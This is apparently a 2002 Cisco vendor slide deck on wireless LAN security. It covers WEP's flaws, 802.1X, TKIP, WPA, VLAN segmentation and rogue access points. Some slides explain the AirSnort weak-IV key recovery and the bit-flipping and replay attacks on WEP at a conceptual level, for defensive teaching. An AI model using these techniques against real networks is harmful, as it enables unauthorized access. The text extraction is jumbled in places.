© 2002, Cisco Systems, Inc. Wireless LAN Security

1© 2002, Cisco Systems, Inc.

Wireless LAN Security


The #1 Concern for Enterpriseabout Wireless: Security

Source: WSJ, 2/5/01


Agenda

• Wireless LAN security issues• Standards-based solutions: 802.1X and TKIP• WiFi Protected Access (WPA)• Other security methods• Rogue APs• Demo• Summary


Security Requirements for WLANs

“Wireless is like having an RJ45 in my car park”


Wireless LAN (WLAN)

Wireless LAN Security Issues

Issue• Access control: Anyone in

AP coverage area can get on WLAN

• Privacy: Wireless sniffer can view all WLAN data packets

802.11 Solution• Use WEP to encrypt all data

transmitted between client and AP

• Without WEP key, user cannot transmit or receive data

Wired LAN

client access point (AP)


Limitations of 802.11 Security

Authentication• Authentication is device-

based, not user-based• Client does not authenticate

network• Existing authentication

databases are not leveraged

Key management• Keys are static• Keys are shared among

devices and APs• If adapter or device is stolen,

all devices and APs must be rekeyed

RC4-based WEP keys• Encryption algorithm is

vulnerable to attack• Message integrity is not

ensured


Addressing the Limitations: 802.11i

Authentication• Authentication is device-

based, not user-based• Client does not authenticate

network• Existing authentication

databases are not leveraged

Key management• Keys are static• Keys are shared among

devices and APs• If adapter or device is stolen,

all devices and APs must be rekeyed

RC4-based WEP keys• Encryption algorithm is

vulnerable to attack• Message integrity is not

ensured

802.1X

TKIP and AES


Overview of 802.1X

• Link layer (layer 2) support for Extensible Authentication Protocol (EAP)

• Securely facilitates authentication message exchanges between:

Wireless ClientAccess PointAAA Server

• Allows the use of numerous authentication algorithms• WLAN implementations of 802.1X must support mutual

authentication


802.1X Authentication Types

• EAP-Cisco Wireless, or LEAPIs supported by Cisco Aironet client adapters on Windows, CE, Linux, Mac OS, and DOSHas been licensed to other vendors

• EAP-TLS (mutual EAP-TLS)Is supported in XP and, soon, other Windows versionsRequires client certificates and server certificates

• PEAPIs supported in XP and, soon, other Windows versionsUses server-side TLS, which requires only server certificates

• EAP-TTLSIs supported by Funk Software’s OdysseyUses server-side TLS


Overview of the Cisco Temporal Key Integrity Protocol (TKIP)

• WEP is brokenAirSnort attack, among others render WEP ineffective

• TKIP is designed to “patch” WEP – not the long term WLAN encryption solution

• Allows existing devices to be upgraded


WEP: AirSnort “Weak IV” Attack

• Attack is based on Fluhrer/Mantin/Shamir paper• Initialization vector (IV) is 24-bit field that changes with

each packet• RC4 Key Scheduling Algorithm creates IV from base key • Flaw in WEP implementation of RC4 allows creation of

“weak” IVs that give insight into base key• More packets = more weak IVs = better chance to

determine base key• To break key, hacker needs 5-6 million packets

IV encrypted data WEP framedest addr src addr


WEP: Bit-Flipping and Replay Attack

• Hacker intercepts WEP-encrypted packet• Hacker flips bits in packet and recalculates ICV CRC32• Hacker transmits to AP bit-flipped frame with known IV• Because CRC32 is correct, AP accepts, forwards frame• Layer 3 device rejects and sends predictable response• AP encrypts response and sends it to hacker• Hacker uses response to derive key (stream cipher)

message XOR

plain text

1234

stream cipher

XXYYZZ

cipher text

XOR 1234

stream cipher

message

predicted plain text


TKIP: Key Hashing (Per-Packet Keys)

IV base key

RC4

stream cipher

plaintext data

encrypted data

RC4

stream cipher

IV base key

hash

Because packet key is hash of IV and base key, IV no longer

gives insight into base key

XOR

packet keyIV

no key hashing key hashing


TKIP: Message Integrity Check (MIC)

IV encrypted datadest addrWEP frame

stream cipher XOR

Sender adds MIC to packet

stream cipher XOR

Recipient examines MIC; discards packet

if MIC is not intact

src addr

MICseq #plaintext ICV

MICseq #plaintext ICV


Broadcast Key Rotation Overview

• Broadcast key is required in 802.1X environments• Re-keying of broadcast key is necessary, just as with

unicast key• Key is delivered to client encrypted with client’s dynamic

key


Airsnort

- Capture enough packets

- A passive listener can recover the secret WEP key by listening into enough packets.

- Enough = 5-6 millions packets

<while running>

Airsnort capture v0.0.9Copyright 2001, Jeremy Bruestle & Blake Hegerle

Total Packets : 2096201300Encrypted Packets: 1009835030000Interesting Packets: 0Timeouts: 0Last IV = 00:50:DA

“Has anyone had any luck with snorting against a Cisco 340 Access Point with 11.07? I have been running against one all day and according to capture I have 60 billion encrypted packets but 0 interesting packets.”- Toby Bearden, hacker, in posting to Airsnort Forum


WPA

• What? WPA = 802.1X + TKIPA non-802.1X option exists for home/SOHO products1

• Why?802.1X and TKIP are key elements of 802.11iIndustry is tired of waiting for 802.11i to be ratifiedResponding to push from Microsoft, Wi-Fi Alliance agreed to incorporate WPA into Wi-Fi compliance testing

• When?Optional testing begins in February 2003WPA compliance is needed for new Wi-Fi certification beginning in August 2003

• Result: WPA is new industry baseline for WLAN security

1 http://www.wi-fi.com/OpenSection/pdf/WPA_Home_Overview.pdf

Overview: http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_Overview.pdfQ&A: http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_QA.pdf

http://www.wi-fi.com/OpenSection/pdf/WPA_Home_Overview.pdf










http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_Overview.pdf

http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_QA.pdf















Cisco and WPA

• Current capabilities of Cisco Aironet productsHave supported 802.1X since December 2000Have supported pre-standard TKIP implementation since December 2001

• Cisco plansContinue to support all 802.1X types, including LEAP, as well as pre-standard TKIPEnsure WPA compliance, primarily by adding support for standard TKIPVLANs can be used for mixed client environments

* Not committed


Firewall Enterprise

High Speed

Hotel/Airport

Wireless

SecureIntranet Using VPN

Security using VPN

Internet


WLAN Security Hierarchy

VirtualPrivate

Network (VPN)

No Encryption, Basic Authentication

Public “Hotspots”

Open Access 40-bit or 128-bitStatic WEP Encryption

Home Use

Basic Security 802.1x,TKIP/SSN Encryption,Mutual Authentication,

Scalable Key Mgmt., etc.

Business

Enhanced Security

Remote Access

Business Traveler,

Telecommuter


VLAN concepts – the wireless world

802.1Q Trunk

802.1Q Trunk

SSID=Engineering

RADIUS Server

Management VLAN (VLAN-id 10)

AP_1

AP_2

Native VLAN=10

SSID=Marketing

SSID=HR

SSID=Guest

EnterpriseNetwork

802.1Q Trunk

802.1Q Trunk

SSID=Engineering

RADIUS Server

Management VLAN (VLAN-id 10)

AP_1

AP_2

Native VLAN=10

SSID=Marketing

SSID=HR

SSID=Guest

EnterpriseNetwork

SSID VLAN-id Security Policy Radius VLAN override(optional per user basis)

Engineering 14 802.1x with Dynamic WEP + TKIP yes

Marketing 24 802.1x with Dynamic WEP + TKIP yes

HR 34 802.1x with Dynamic WEP + TKIP no

Guest 44 Open/no WEP no


The problem with rogue APs…

• Wireless APs can be deployed securely

– 802.1x with TKIP–VPN

• Rogue APs do not conform to corporate security requirements and open the network to trespassers, snoops, and hackers

“Wireless is Rogue APs are like having an RJ45 in my car

park.”

“Wireless is Rogue APs are like having an RJ45 in my car

park.”


Who installs Rogue APs?-“Focus on the Frustrated Insider”

Frustrated Insider

• User that installs wireless AP in order to benefit from increased efficiency and convenience it offers

• Common because of wide availability of low cost APs

• Usually ignorant of AP security configuration, default configuration most common

Jones from accounting

>99.9% of rogue APs

Malicious hacker • Penetrates physical security specifically to install a rogue

AP• Can customize AP to hide it from detection tools• Hard to detect – more effective to prevent via 802.1x and

physical security• More likely to install LINUX box than an AP

James Bond

<.1% of rogue APs


Media Attention to Rogue APsWardriving

Pringles can Antenna•12 Dbi Gain•45 minutes to construct•$6.45 total cost

http://www.oreillynet.com/cs/weblog/view/wlg/448

•12,600 hits on google for wardriving•Most wardrivers use NetStumbler to find, map (using GPS), and upload locations of discovered APs to online database•NetStumbler is a free download for Windows and WinCE

War Driving (wôr dri'vin) v.1 Driving around looking for unsecured wireless networks.-term coined by Pete Shipley

http://www.wirelesscentral.net/aprod/STUM-ANTW.html?ns


NetStumbler in use – 59 APs in 7 miles

• My daily drive to work taken within the car at normal speeds with an IPAQ running NetStumbler with an integrated PCMCIA antenna

• In addition to AP MAC address and SSID, the following information is available with netstumbler

–802.11 channel–Signal to Noise Ration (SNR)–Latitude/longitude (if GPS connected)–More…59 APs found

WEP off

WEP on

SSID of APs found


Media Attention to Rogue APsWarChalking

What is Warchalking?•Warchalking is the process of looking for wireless computer networks and making chalk marks to indicate their locations so that others can more easily find them.•http://www.warchalking.org/

•Online community containing descriptions and photos of warchalked sites

•12,100 hits on Google for “warchalking”

http://www.warchalking.org/


Summary…

• You probably already have a WLAN deployment in your corporate network (whether you know it or not)

• An IT deployed and supported WLAN is the best way to prevent insiders from installing their own APs

• 802.1x on switched infrastructure prevents Rogue Devices

–Effective against all classes of unauthorized access (frustrated Insider and “Malicious hacker”–Allows identity based policy on switch port

• Do you own ‘War Walking’


Questions?

293041055_05F9_c1 © 1999, Cisco Systems, Inc.

303030© 2001, Cisco Systems, Inc. All rights reserved.Presentation_ID

Documents

© 2002, Cisco Systems, Inc. Wireless LAN Security